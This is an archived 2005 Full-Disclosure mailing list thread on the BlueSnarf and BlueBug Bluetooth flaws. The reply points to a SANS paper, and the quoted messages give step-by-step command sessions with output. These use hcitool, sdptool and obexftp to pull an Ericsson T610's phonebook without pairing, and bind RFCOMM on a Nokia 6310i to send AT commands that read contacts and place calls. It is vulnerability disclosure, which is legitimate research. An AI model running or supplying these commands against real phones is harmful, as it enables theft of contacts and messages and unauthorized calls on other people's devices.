| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 09 Jan 2005 19:04:49 -0500 From: Scott Renna <srenna@...music.com> To: Eric Detoisien <eric-mailing@...b-internet.fr> Cc: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com Subject: Re: Re: Bluetooth: BlueSnarf and BlueBug Full Disclusore When I saw Adam's announcement a while back on these issues, I wrote a paper up for SANS. Describes running the attack on FreeBSD based system against a T610. Check out: http://www.giac.org/practical/GCIA/Scott_Renna_GCIA.pdf Eric Detoisien wrote: > An easy way to get phonebook on Ericsson T610 via bluetooth without pairing : > > tough:~# hcitool scan > Scanning ... > 00:0A:D9:XX:XX:XX T610 > > tough:~# sdptool browse 00:0A:D9:XX:XX:XX > Browsing 00:0A:D9:XX:XX:XX ... > [...] > Service Name: OBEX Object Push > Service RecHandle: 0x10005 > Service Class ID List: > "OBEX Object Push" (0x1105) > Protocol Descriptor List: > "L2CAP" (0x0100) > "RFCOMM" (0x0003) > Channel: 10 -----------------------> only RFCOMM channels 10 and 15 are open > "OBEX" (0x0008) > Profile Descriptor List: > "OBEX Object Push" (0x1105) > Version: 0x0100 > [...] > Service Name: OBEX Basic Imaging > Service RecHandle: 0x1000b > Service Class ID List: > "" (0x111b) > Protocol Descriptor List: > "L2CAP" (0x0100) > "RFCOMM" (0x0003) > Channel: 15 > "OBEX" (0x0008) > Profile Descriptor List: > "" (0x111a) > Version: 0x0100 > [...] > > tough:~# obexftp -b 00:0A:D9:XX:XX:XX -B 10 -g telecom/pb.vcf > Browsing 00:0A:D9:FA:03:B7 ... > Channel: 7 > No custom transport > Connecting...bt: 1 > done > Receiving telecom/pb.vcf.../done > Disconnecting...done > > > Eric Detoisien > > > >>The Bluebug, as described on [1] is trivially exploitable on some non-Symbian >>Nokia phones. It allows attacker to create serial profile connection without >>pairing or asking for permission, therefore it gives unauthorized access to all >>AT commands. It is possible to read/delete/send SMS messages, add/view/delete >>phonebook entries, change call diverts, initiate voice or data call. >> >>Demonstration on Nokia 6310i: >> >>laptop:~# hcitool scan >>Scanning ... >> 00:60:57:38:8C:D8 Nokia 6310i >>laptop:~# rfcomm bind /dev/rfcomm0 00:60:57:38:8C:D8 17 >> >>Now you can use plain AT commands, as described in manual [2] or Gnokii [3], for >>example: >> >>laptop:~# cu -l rfcomm0 -s 9600 >>Connected. >>[ATE1] >>OK >>ATI >>Nokia >> >>OK >>AT+CPBS? >>+CPBS: "SM",0,100 >> >>OK >>AT+CPBR=? >>+CPBR: (1-100),48,18 >> >>OK >>ATDT+48609xxxxxx >>OK >> >>As you can see, the bug is really trivial and looks rather like backdoor. >> >>[1] - http://www.thebunker.net/security/bluetooth.htm >>[2] - http://ncsp.forum.nokia.com/download/?asset_id=11579;ref=devx >>[3] - http://www.gnokii.org/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists